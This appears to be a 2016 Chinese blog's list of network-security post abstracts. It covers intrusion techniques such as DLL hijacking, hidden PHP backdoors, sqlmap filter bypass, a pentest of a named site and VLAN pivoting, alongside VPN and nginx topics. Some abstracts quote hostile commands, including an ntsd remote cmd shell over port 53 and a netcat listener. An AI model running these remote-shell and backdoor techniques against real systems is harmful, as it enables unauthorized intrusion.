文章分类 -  网络安全

摘要:前些天都在工作,在业余时间我也在不断的看书,为了这次教程的成功更新,现在开始就开始更新web安全教程啦,其中涉及的动画教程不一定都是本博客所有 LCX的诞生理论 在理论上只要连着网我们都可以访问的,但是什么是现实呢,现实中往往由于技术的原因我们的实现是有困难的,在局域网中某台计算机仅仅开放了web服 阅读全文
posted @ 2016-06-18 19:52 亦非台 阅读(270) 评论(0) 推荐(0)
摘要:刚学到的一个技巧,TELNET下也可以运行 先在目标机器上执行: C:\>ntsd -server tcp:port=53 cmd.exe 然后本地机器执行: C:\>ntsd -remote tcp:server=192.168.1.105,port=53 运行效果: 刚学到的一个技巧,TELNE 阅读全文
posted @ 2016-06-18 11:00 亦非台 阅读(173) 评论(0) 推荐(0)
摘要:某天,碰到一台india的ORACLE服务器,从远程桌面可以知道,这又是一台域控下的工作机。 检测ORACLE用户得到下列结果: [-] Loading services/sids from service file [-] Checking sid (ORCL) for common passwo 阅读全文
posted @ 2016-06-18 10:57 亦非台 阅读(381) 评论(0) 推荐(0)
摘要:DLL劫持漏洞已经是一个老生常谈,毫无新鲜感的话题了。DLL劫持技术也已经是黑客们杀人越货,打家劫舍必备的武器。那么,随着Win10的诞生,微软是否已经修复了此漏洞?同时在当前的安全环境下,DLL劫持漏洞是否又有新的利用方式和价值? 本文将对DLL劫持漏洞的原理,漏洞实现,漏洞挖掘,漏洞利用,漏洞防 阅读全文
posted @ 2016-06-13 13:31 亦非台 阅读(3338) 评论(0) 推荐(0)
摘要:前言* 随着Nginx 大量被各互联网公司使用,常见的Nginx 用来做反向代理WEB 服务器、缓存服务器,nginx 应用很广泛,今天我们来研究一下使用Nginx架设高性能流媒体服务器 。 一、 系统环境 系统版本:CentOS 5.8x86_64 Nginx版本: Nginx-1.4.2.tar 阅读全文
posted @ 2016-06-12 09:23 亦非台 阅读(341) 评论(0) 推荐(0)
摘要:本地Windows监听 nc -vv -l -p 1234 首先从sf上get一个tar的压缩包 wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat 阅读全文
posted @ 2016-06-11 10:41 亦非台 阅读(395) 评论(0) 推荐(0)
摘要:PPTP/L2TP协议讲述以及应用部署 一、基本概念 PPTP PPTP是对端对端协议(PPP)的一种扩展,它采用了PPP所提供的身份验证、压缩与加密机制。PPTP能够随TCP/IP协议一道自动进行安装。PPTP与Microsoft端对端加密(MPPE)技术提供了用以对保密数据进行封装与加密的VPN 阅读全文
posted @ 2016-06-11 07:57 亦非台 阅读(4737) 评论(0) 推荐(0)
摘要:.htaccess是什么? .htaccess叫分布式配置文件,它提供了针对目录改变配置的方法——在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。并且子目录中的指令会覆盖更高级目录或者主服务器配置文件中的指令。一般来说,如果你的虚拟主机使用的是Unix或 Li 阅读全文
posted @ 2016-06-08 09:17 亦非台 阅读(208) 评论(0) 推荐(0)
摘要:Nmap是用于端口扫描,服务检测,甚至是漏洞扫描等多种功能的强大工具。Nmap从入门到高级覆盖了许多基础的概念和命令,在这篇文章的第二部分,我将提及Nmap一些高级的技术。 防火墙和入侵检测系统(IDS)从安全的视角来讲,它们在对拒绝远程目标起到了非常重要的作用。因为这些硬件和软件阻塞入侵非常有效果 阅读全文
posted @ 2016-06-07 22:37 亦非台 阅读(2740) 评论(0) 推荐(0)
摘要:0x00 前言 这个漏洞已经出来很久了,以前简单分析过,但是由于时间关系,没能深入研究原理,网上对这个漏洞的分析也不太多,最近由于工作原因,深入分析了一下这个漏洞的原理,这里重点将漏洞调试过程,以及一些之前遇到的一些奇怪问题的原因记录下来。 首先来看一下官方对这个漏洞的描述,如下图: 可以看到,这个 阅读全文
posted @ 2016-06-07 19:58 亦非台 阅读(1119) 评论(0) 推荐(0)
摘要:IPSec VPN是目前VPN技术中点击率非常高的一种技术,同时提供VPN和信息加密两项技术,这一期专栏就来介绍一下IPSec VPN的原理。 IPSec VPN应用场景 IPSec VPN的应用场景分为3种: 1. Site-to-Site(站点到站点或者网关到网关):如弯曲评论的3个机构分布在互 阅读全文
posted @ 2016-06-06 08:54 亦非台 阅读(5) 评论(0) 推荐(0)
摘要:C:\Windows\system32\cmd.exe 884 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:\Windows\system32\svchost.exe 924 492 svchost.exe x86_64 0 NT AUTHORITYN 阅读全文
posted @ 2016-06-05 19:49 亦非台 阅读(710) 评论(0) 推荐(0)
摘要:每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。 但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了 阅读全文
posted @ 2016-06-04 19:16 亦非台 阅读(703) 评论(0) 推荐(0)
摘要:在用lvs做负载均衡时,后端真实服务器要进行arp抑制,将一些命令写在多个不同的地方往往不方便管理,本文将所有的命令集中在一个脚本,开机后自启动,即可完成arp抑制,vip绑定等工作 #!/bin/bash #chkconfig:345 20 80 #description: lvs real se 阅读全文
posted @ 2016-06-04 14:23 亦非台 阅读(486) 评论(0) 推荐(0)
摘要:如何使用rar在命令行下打包目录: 如何用命令打包一个站点,包括其所有目录文件? 这个问题本来很简单,因为多数站点主机都会安装winrar,如果你获得的shell能够运行exe文件,你就可以使用rar.exe这个命令行程序进行打包,rar的详细命令可以在winrar的安装目录里"Rar.txt"文件 阅读全文
posted @ 2016-06-04 12:24 亦非台 阅读(1934) 评论(0) 推荐(0)
摘要:在前面的文章(中间人攻击ARP毒化)中,我们讨论了黑客危险的攻击和实用的ARP中毒原理。在本文中,我将首先探讨检测和防止ARP中毒(或ARP欺骗)攻击,然后我将回顾其他的中间人攻击-DNS欺骗。 ARP缓存攻击是一项非常危险的攻击,重要的是在用户中创建安全的意识和分析有效的工具和策略。如果你操作的是 阅读全文
posted @ 2016-06-03 19:05 亦非台 阅读(404) 评论(0) 推荐(0)
摘要:生成树协议是一种二层管理协议,它通过有选择性地阻塞网络冗余链路来达到消除网络二层环路的目的,同时具备链路的备份功能。 由于生成树协议本身比较小,所以并不像路由协议那样广为人知。但是它却掌管着端口的转发大权—“小树枝抖一抖,上层协议就得另谋生路”。真实情况也确实如此,特别是在和别的协议一起运行的时候, 阅读全文
posted @ 2016-06-03 17:19 亦非台 阅读(1976) 评论(0) 推荐(0)
摘要:强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: 404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时 阅读全文
posted @ 2016-05-31 20:00 亦非台 阅读(129) 评论(0) 推荐(0)
摘要:对某使用了CDN网站的渗透过程 这次渗透的目标是:http://www.91ri.org(由于这网站存放了大量的用户资料,担心被Helen等人轮),就不截网站全图了。 在网站里随便走了走,发现基本上是静态页面,检测出首页是index.php,二话不说把它扔到wwwscan里面跑,初步判断出服务器是n 阅读全文
posted @ 2016-05-31 00:37 亦非台 阅读(672) 评论(0) 推荐(0)
摘要:内网渗透之跨Vlan渗透的一种方法 前言 随着日益发展的网络技术,网络线路也变的越来越复杂。渗透测试人员在web中通过注入,上传等基本或高级脚本渗透方法到达了边界服务器。再深入时则会面对更复杂的网络环境,比如如何跨vlan。本文旨在讲述获取内网权限后突破VLAN的限制进行渗透的一种思路。(与网上流传 阅读全文
posted @ 2016-05-30 14:49 亦非台 阅读(3232) 评论(0) 推荐(0)